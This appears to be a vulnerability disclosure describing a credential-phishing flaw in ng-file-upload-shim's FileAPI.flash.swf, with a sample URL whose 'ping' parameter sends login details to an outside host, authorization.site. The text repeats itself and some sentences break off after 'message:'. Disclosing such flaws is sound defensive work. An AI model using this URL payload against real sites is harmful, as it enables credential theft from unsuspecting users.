And that will prompt the user to enter their login details, but the login details are actually being sent to the attacker's website (authorization.site) instead of my website.
Firefox warns the user that the data will be sent to another site.
Safari will prompt the credentials with message:
Because it can be used by an unauthenticated attacker to attack any legitimate user, and since the url the victim sees is the one for the legitimate use case, it might be easier to phish
This file is vulnerable to an attack, where the attacker can send the victim to this URL:
https://my.website.com/**/**/**/**/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site
And that will prompt the user to enter their login details, but the login details are actually being sent to the attacker's website (authorization.site) instead of my website.
Firefox warns the user that the data will be sent to another site.
Safari will prompt the credentials with message:
Because it can be used by an unauthenticated attacker to attack any legitimate user, and since the url the victim sees is the one for the legitimate use case, it might be easier to phish
https://**my.website.com**/##/##/##/##/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site